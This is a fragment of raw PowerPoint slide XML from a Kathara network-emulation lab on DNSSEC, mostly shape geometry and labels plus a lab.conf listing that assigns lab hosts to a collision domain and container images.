                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9328" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7901DD6E-E87B-E586-AA66-B042B9598BC6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9332" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54873EDC-4545-0211-0D2A-227DD3C6F2C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
                <a:t>dnsuni2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9333" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9ECCA72-7D83-4801-A6F1-0A042BED50B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7875292" y="3207861"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9334" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48435FB9-013D-C907-BFC0-0D9F67F0AE31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9335" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D68FF29D-8A68-FC1A-5B4A-9C0BFF9E353B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>10</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260033218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1317CF-5970-6651-641A-C3CA0ABF347E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13316" name="Rectangle 95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EAE383-6D4E-8AF8-D2B0-B5F75B09284D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>a quick look at the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD29C4CA-918D-F7DF-8C81-EF6D72DD4762}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2047DB9C-A31F-B22C-4983-74006706F510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13319" name="Group 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E38D683-504E-CC44-5406-02A29EA71195}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="609093" y="1217551"/>
            <a:ext cx="7335694" cy="5063541"/>
            <a:chOff x="2448" y="3333"/>
            <a:chExt cx="3786" cy="722"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13321" name="AutoShape 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB10E369-F691-0C28-7427-18815AAF19A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2448" y="3362"/>
              <a:ext cx="3786" cy="693"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>pc2[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>handsonsecurity</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>seed-server:apache-php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>uniromatre</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/base"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r1[ipv6]="false"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[0]="A"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[image]="</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/bind:9.16"</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="it-IT" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
